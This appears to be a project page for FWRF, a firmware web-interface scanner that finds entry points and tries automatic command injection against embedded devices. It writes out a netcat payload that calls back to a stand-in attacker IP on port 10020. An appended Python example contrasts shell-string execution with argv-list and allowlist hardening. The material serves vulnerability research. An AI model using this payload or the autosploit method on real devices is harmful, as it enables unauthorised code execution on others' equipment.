Dec 5, 2020
FWRF (don't try to pronounce it) is an open source tool for firmware web-side analysis.


Due to some stupid minds, the new trend is to put computers in everything. This PoC was initially written for testing some Wi-Fi antenna firmware.
The only common element among embedded Linux devices with a web interface is the front end (HTML/JS); the rest can be PHP (Ubiquiti), ELF (Netgear), some_new_hype_technology... Doesn't matter.
The goal of FWRF is to find entry points and vulnerabilities, and try to autosploit them.

How?

FWRF is composed of 4 parts:

  • File scan : scans all files in the extracted-firmware directory
  • Entrypoint scan : extracts URLs with args, forms, etc.
  • Check rce : tries basic code execution via those parameters
  • Test server : starts a test server for manual search

RCE checking

  • A server is started attacker-side (listening on port 10020), waiting for a TCP packet.
  • The payload sent to {insert here a hype-connected-device name} is echo\t1|nc\tattacker_ip\t10020
  • In the case of dumb code (e.g. exec("/bin/do_stuff --foobar $parameter") with a controlled parameter), the packet is sent to the attacker and FWRF knows the attack succeeded.

How to start

Firmware web rce finder

optional arguments:

-h, --help show this help message and exit
-s, --server run test server only for manual tests
base folder of the extracted firmware
Address of live machine (like
Address of this machine (like
-c COOKIES, --cookies COOKIES
Use cookies for authenticated parts
-v, --verbose Verbose mode

  • -s : start the test server, waiting for a TCP packet on port 10020
  • -f : path to the extracted firmware partition
  • -r : remote connected-stuff IP
  • -l : attacker IP (used in payload generation)
  • -c : cookies, if the remote interface needs authentication ("foo=bar&baz=gu")
  • -v : show more stuff

No magic exploitation

FWRF is not magic; it will only trigger obvious RCE. But if you want to search further, it can help. First, use the -f and -v parameters: the full list of entry points, parameters and HTTP methods is returned. Then, start the test server and search by yourself using the provided payload (or anything sending a TCP packet on port 10020).
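The "dumb code" pattern from the RCE checking section, shown next to a hardened form. This is an added example, not FWRF's code or code from the original post. It assumes a stand-in child process that prints its argv in place of /bin/do_stuff, an assumed allowlist policy, and a harmless local probe shaped like the page's payload.

```python
import re
import shlex
import subprocess
import sys

# Constructed stand-in for "/bin/do_stuff": a child process that prints its argv.
CHILD = [sys.executable, "-c", "import sys; print(sys.argv[1:])"]

# Assumed policy: the option only ever needs a short alphanumeric token.
ALLOWED = re.compile(r"[A-Za-z0-9._-]{1,64}")

# Harmless constructed probe with the same shape as the page's payload
# (tab-separated words joined by a pipe); the second command is a local echo.
PROBE = "1|echo\tINJECTED"


def run_vulnerable(parameter: str) -> str:
    """The exec("... $parameter") pattern: one string handed to /bin/sh."""
    prefix = " ".join(shlex.quote(part) for part in CHILD)
    cmd = f"{prefix} --foobar {parameter}"  # parameter is NOT quoted
    done = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return done.stdout


def run_without_shell(parameter: str) -> str:
    """argv-list execution: metacharacters stay inside a single argument."""
    done = subprocess.run(CHILD + ["--foobar", parameter],
                          capture_output=True, text=True)
    return done.stdout


def run_hardened(parameter: str) -> str:
    """Allowlist the value first, then execute without a shell."""
    if not ALLOWED.fullmatch(parameter):
        raise ValueError(f"rejected parameter: {parameter!r}")
    return run_without_shell(parameter)


if __name__ == "__main__":
    print("shell string :", run_vulnerable(PROBE).strip())
    print("argv list    :", run_without_shell(PROBE).strip())
    try:
        run_hardened(PROBE)
    except ValueError as err:
        print("allowlist    :", err)
```

In the shell-string case the captured output is the second command's, because the shell splits the parameter at the pipe and treats tabs as word separators; in the argv case the whole value arrives as one literal argument.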